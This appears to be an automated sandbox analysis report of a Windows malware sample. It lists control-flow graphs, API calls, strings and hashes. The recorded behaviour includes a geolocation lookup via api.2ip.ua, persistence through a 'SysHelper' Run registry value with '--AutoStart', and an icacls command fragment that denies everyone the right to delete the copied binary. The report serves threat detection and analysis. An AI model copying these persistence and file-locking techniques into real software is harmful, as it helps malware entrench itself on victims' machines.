            • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 924 40d037 922->924 924->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 944 40d0cd-40d0e1 call 414300 935->944 945 40d0bf-40d0ca call 422587 935->945 941 40d093-40d09b call 422587 936->941 942 40d09e-40d0b4 call 413d40 936->942 938->912 939->938 941->942 942->935 944->928 954 40d0e7-40d149 call 413010 944->954 945->944 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 968 40d1a0 965->968 966->965 967 40d191-40d198 966->967 967->965 969 40d1c7-40d1c9 967->969 970 40d1a2-40d1a6 968->970 969->970 971 40d1b3-40d1c5 970->971 972 40d1a8-40d1b0 call 422587 970->972 971->931 972->971
            APIs
            • _memset.LIBCMT ref: 0040CF4A
            • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
            • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
            • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
            • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
            Strings
            • "country_code":", xrefs: 0040CFE1
            • Microsoft Internet Explorer, xrefs: 0040CF5A
            • https://api.2ip.ua/geo.json, xrefs: 0040CF79
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Internet$CloseHandleOpen$FileRead_memset
            • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
            • API String ID: 1485416377-2962370585
            • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
            • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
            • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
            • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 622 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->622 623 411e89-411e91 call 422587 621->623 633 411f36-411f38 622->633 634 411f3a-411f3f 622->634 623->622 631 411e3c-411e50 PathFileExistsW 629->631 632 411e2e-411e39 call 422587 629->632 635 411e00-411e08 call 422587 630->635 636 411e0b-411e23 call 4145a0 630->636 631->621 642 411e52-411e57 631->642 632->631 640 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->640 641 411f40-411f49 634->641 635->636 636->629 653 411f98-411fa0 640->653 654 411fce-411fe9 640->654 641->641 645 411f4b-411f4d 641->645 646 411e59-411e5e 642->646 647 411e6a-411e6e 642->647 645->640 646->647 649 411e60-411e65 call 414690 646->649 647->610 651 411e74-411e77 647->651 649->647 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 662 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->662 663 412000-412009 657->663 664 411fbf-411fc9 call 415c10 658->664 661 411fb0-411fb9 659->661 661->661 666 411fbb-411fbd 661->666 671 4121d1-4121d5 662->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 662->672 663->663 668 41200b-41200d 663->668 664->654 666->664 668->662 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
            APIs
            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
            • _memset.LIBCMT ref: 00411D3B
            • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
            • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
            • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
            • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
            • GetCommandLineW.KERNEL32 ref: 00411EB4
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
            • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
            • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
            • UuidCreate.RPCRT4(?), ref: 00411EFC
            • UuidToStringW.RPCRT4(?,?), ref: 00411F14
            • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
            • PathAppendW.SHLWAPI(?,?), ref: 00411F83
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
            • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
            • DeleteFileW.KERNEL32(?), ref: 00412036
            • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
            • _memset.LIBCMT ref: 00412090
            • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
            • lstrcatW.KERNEL32(?,?), ref: 004120C0
            • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
            • lstrlenW.KERNEL32(?), ref: 004120D7
            • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
            • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
            • _memset.LIBCMT ref: 00412120
            • SetLastError.KERNEL32(00000000), ref: 00412146
            • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
            • lstrcatW.KERNEL32(?,?), ref: 0041216D
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
            • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
            • API String ID: 2589766509-1182136429
            • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
            • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
            • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
            • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

            Control-flow Graph

            APIs
            • GetCommandLineW.KERNEL32 ref: 00412235
            • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
            • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
            • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
            • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
            • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
            • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
            • CloseHandle.KERNEL32(00000000), ref: 00412347
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
            • API String ID: 3668891214-3807497772
            • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
            • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
            • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
            • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 986 4235a0 976->986 977->976 982 4235c0-4235c3 977->982 984 4235d7-4235dd 982->984 985 4235c5 982->985 989 4235e9 call 42fb64 984->989 990 4235df 984->990 987 4235c7-4235c9 985->987 988 4235cb-4235d5 call 425208 985->988 991 4235a2-4235a8 986->991 987->984 987->988 988->986 996 4235ee-4235fa call 42f803 989->996 990->988 993 4235e1-4235e7 990->993 993->988 993->989 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->991 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->991 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->991 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->991 1038 42368f-423696 1033->1038 1038->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
            APIs
            • _memset.LIBCMT ref: 004235B1
              • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
            • __gmtime64_s.LIBCMT ref: 0042364A
            • __gmtime64_s.LIBCMT ref: 00423680
            • __gmtime64_s.LIBCMT ref: 0042369D
            • __allrem.LIBCMT ref: 004236F3
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
            • __allrem.LIBCMT ref: 00423726
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
            • __allrem.LIBCMT ref: 0042375B
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
            • String ID:
            • API String ID: 1503770280-0
            • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
            • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
            • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
            • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1060 427b0b-427b1a call 427ad7 ExitProcess
            APIs
            • ___crtCorExitProcess.LIBCMT ref: 00427B11
              • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
              • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
            • ExitProcess.KERNEL32 ref: 00427B1A
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess$AddressHandleModuleProc___crt
            • String ID: i;B
            • API String ID: 2427264223-472376889
            • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
            • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
            • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
            • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1063 40ef50-40ef7a call 420c62 1066 40efdc-40efe2 1063->1066 1067 40ef7c 1063->1067 1068 40ef80-40ef85 call 420c62 1067->1068 1070 40ef8a-40efbd call 42b420 1068->1070 1073 40efc0-40efcf 1070->1073 1073->1073 1074 40efd1-40efda 1073->1074 1074->1066 1074->1068
            APIs
            • _malloc.LIBCMT ref: 0040EF69
              • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
              • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
              • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00760000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
            • _malloc.LIBCMT ref: 0040EF85
            • _memset.LIBCMT ref: 0040EF9B
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _malloc$AllocateHeap_memset
            • String ID:
            • API String ID: 3655941445-0
            • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
            • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
            • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
            • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1075 42fb64-42fb77 call 428520 1078 42fba5-42fbaa call 428565 1075->1078 1079 42fb79-42fb8c call 428af7 1075->1079 1084 42fb99-42fba0 call 42fbab 1079->1084 1085 42fb8e call 42fe47 1079->1085 1084->1078 1088 42fb93 1085->1088 1088->1084
            APIs
            • __lock.LIBCMT ref: 0042FB7B
              • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
              • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
              • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
            • __tzset_nolock.LIBCMT ref: 0042FB8E
              • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
              • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
              • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
              • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
              • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
              • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
            • String ID:
            • API String ID: 1282695788-0
            • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
            • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
            • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
            • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1089 427f3d-427f47 call 427e0e 1091 427f4c-427f50 1089->1091
            APIs
            • _doexit.LIBCMT ref: 00427F47
              • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
              • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
              • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
              • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
              • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
              • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
              • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
              • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Pointer$Decode$Encode$__lock_doexit
            • String ID:
            • API String ID: 2158581194-0
            • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
            • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
            • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
            • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
            APIs
            • GetVersionExA.KERNEL32(00000094), ref: 00481983
            • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
            • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
            • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
            • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
            • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
            • FreeLibrary.KERNEL32(?), ref: 00481AC5
            • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
            • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
            • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
            • FreeLibrary.KERNEL32(?), ref: 00481C15
            • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
            • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
            • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
            • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
            • FreeLibrary.KERNEL32(?), ref: 00481D45
            • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
            • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
            • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
            • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
            • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
            • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
            • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
            • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
            • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
            • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
            • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
            • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
            • GetTickCount.KERNEL32 ref: 00481F03
            • GetTickCount.KERNEL32 ref: 00481FF1
            • GetTickCount.KERNEL32 ref: 00482066
            • GetTickCount.KERNEL32 ref: 00482095
            • GetTickCount.KERNEL32 ref: 004820FB
            • GetTickCount.KERNEL32 ref: 00482118
            • GetTickCount.KERNEL32 ref: 00482187
            • GetTickCount.KERNEL32 ref: 004821A4
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$CountTick$Library$Load$Free$Version
            • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
            • API String ID: 842291066-1723836103
            • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
            • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
            • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
            • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
            APIs
            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
            • __CxxThrowException@8.LIBCMT ref: 00411026
              • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
            • __CxxThrowException@8.LIBCMT ref: 00411051
            • lstrlenA.KERNEL32(?,00000000), ref: 00411059
            • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
            • __CxxThrowException@8.LIBCMT ref: 0041107A
            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
            • __CxxThrowException@8.LIBCMT ref: 004110AB
            • _memset.LIBCMT ref: 004110CA
            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
            • __CxxThrowException@8.LIBCMT ref: 004110F0
            • _malloc.LIBCMT ref: 00411100
            • _memset.LIBCMT ref: 0041110B
            • _sprintf.LIBCMT ref: 0041112E
            • lstrcatA.KERNEL32(?,?), ref: 0041113C
            • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
